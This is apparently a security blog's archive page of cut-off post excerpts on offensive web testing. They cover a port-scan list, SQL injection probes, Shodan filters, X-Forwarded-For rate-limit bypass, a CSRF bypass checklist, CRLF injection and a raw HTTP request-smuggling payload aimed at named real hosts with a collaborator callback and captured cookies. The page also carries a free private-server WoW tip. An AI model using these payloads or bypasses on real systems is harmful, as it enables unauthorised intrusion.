Category Archives: Uncategorized

Port Scans

Port list for Angry Port Scanner (feel free to copy+paste into options) 71920-212223254243495367-686970798088102110113119123135137-139143161-162177179201264318381-383389411-412443445464465497500512513514515520521540554546-547560563587591593631636639646691860873902989-99099399510251026-102910801080119412141241131113371433-143415121589170117231725174117551812-1813186319852000200220492082-208321002222223523022483-2484274529673050307431243127312832223260330633893689369037243784-3785433344444664467248995000500150015004-50055050506051905222-52235432550055545631-5632580059006000-60016112612962576346-63476500656665886665-66696679669766996881-69996891-6901697072127648-7649800080808086-808781008118820085008767886691009101-910391199800989899889999100001000010113-101161137112035-120361234513720-137211456715118192261963820000248002599927015273742896031337

Mullvad VPN

$5 VPN (why are you not using it yet???) go get it here Completely anonymous, no signing up, accepts crypto, no logs. Stop wasting money on shit VPN service.

SQL Injection

How to find SQL injection vulnerability?1) Logical OperationOne of the best ways to confirm a SQL injection is by making it operate a logical operation and having the expected results. For example: if theGET parameter ?username=Slacker returns the same content as ?username=Slacker’ or ?username=Slacker+’1’=’1 then, you found a SQLinjection.2) Time Based SQL InjectionMost relative place […]

Interesting Shodan Filters

» city » country nginx city:”San Diego” country:US » geo Devices within a 50km radius of San Diego (32.8,-117): geo:32.8,-117,50 » hostname “Server: gws” hostname:google » net net: » os microsoft-iis os:”windows 2003″ » before/ after apache country:CH after:22/03/2010 before:4/6/2010 » port proftpd port:21 21 (FTP) 22 (SSH) 23 (Telnet) 25 (SMTP) 53 (DNS) 80 […]

Play WoW for free

Download the Mists client Change your realmlist Change your wtf/ file Go to your game directory and open “” file using a text editor, such as notepad. Change line which contains the realmlist to: “set realmlist” If you encounter a problem with saving it, make sure the realmlist file is NOT set to […]

Arch Linux

OS install guide – Installing Yay – Install Black Arch repositories –

rate limit bypass

imageimage Limit Bypass Headers:Most Application’s use X-Forwarded-For common method for identifying the originating IP address of the client. We All know that using XForwarded-For: IP Header Can sometime’s Bypass Ratelimit Protection. Sometimes Adding Two Times X-Forwarded-For: IP Header Instead of Onetime Can Bypass Ratelimit ProtectionX-Forwarded: […]

http Request smuggling

TPOST /login HTTP/1.1Host: staging-login.newrelic.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/70.0.3508.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8Accept-Encoding: gzip, deflateCookie: optimizelyEndUserId=oeu1547215128308r0.023321653201122228; ajs_user_id=null; ajs_group_id=null; ajs_anonymous_id=%22a5f7b9bb-8c8a-4add-ac69-75200d4c46cb%22;Content-Type: application/x-www-form-urlencodedContent-Length: 189Transfer-Encoding: chunkedTransfer-Encoding: foo
GET / HTTP/1.1Host: skeletonscribe.netContent-Length: 10
x= DELETE / HTTP/1.1Transfer-Encoding: chunkedHost: api.zomato.comContent-Length: 91User-Agent: Treasure/6.7
GET https://YOUR_COLLAB_URL/desync/ HTTP/1.1X: X Safari/537.36TSNGUID=6093d809-7d9d-4d52-bfb9-335de9fb69b8; _ga=GA1.2.1374597116.1547216490; _gid=GA1.2.1093027572.1547216490; _gcl_au=1.1.1026642629.1547216493; _mkto_trk=id:412-MZS-894&; __qca=P0-235566894-1547221374728; intercom-id-cyym0u3i=bd3a0989-6e9f-4e6d-a497-9a41ef6d5290; _fbp=fb.1.1547249472663.621468648; ei_client_id=5c39274682f6eb000fa6d52a; _golden_gate_session=bkRPMUZ3STBrY0laZG0zemY1Umg5cFVhcWpNaGpvZWN2T0tOM3hWL2p2UVdaVTJLZFh5NkJtQnZHV2FIR3hnZWpKaWFvM2F2WkRab3hjWTd5b3A1T2dOY20zWWNQaFhZNWVRZXFuRkFwU3l1YVZMdm1JSW9pSGd0UnRicnRBUVdhaGg3UXJQTFJ0c3ZkMHRyaHZqNjYreCt4dWUwVlp1UTdrSVFpSEx6akVITjRWWGNrSUR5NGdIdG80UnFJS2xpVTNlU1BpK0hjWEZJMVF1R2I4RlNNeUdicVdTWFVDQnBlQ0NQSXdNYXFJM2lDTWc5VldLOTJ3N1A3Wll5RytpZVNya2J1WTdTNUZ5UVFRNk5KVmt2TmNudlU3WDFQMVJPbGtkWXJJWXd1YjA9LS1MeU1EbTkrZ29qVVo2VkNUMDhnMVp3PT0%3D–155cef8a5f5d2bcb69b1d1952af040a3479aeacb; _gat=1GET […]

CSRF bypass

1- Change single char 2- Sending empty value of token 3- Replace with same length 4- Clickjacking 5- Changing POST/GET method 6- RemoveCSRF parameter from request 7- Use another users’s valid token 8- CSRF protection by Referer header? Remove the header [ADD in form ] 9-Bypass using subdomain [] 10- Try to decrypt hash(maybe CSRF […]

CRLF injection

CRLFThe term CRLF refers to Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). They’re used to note the termination of a line,however, dealt with differently in today’s popular Operating Systems. For example: in Windows both a CR and LF are required to notethe end of a line, whereas in Linux/UNIX a LF is […]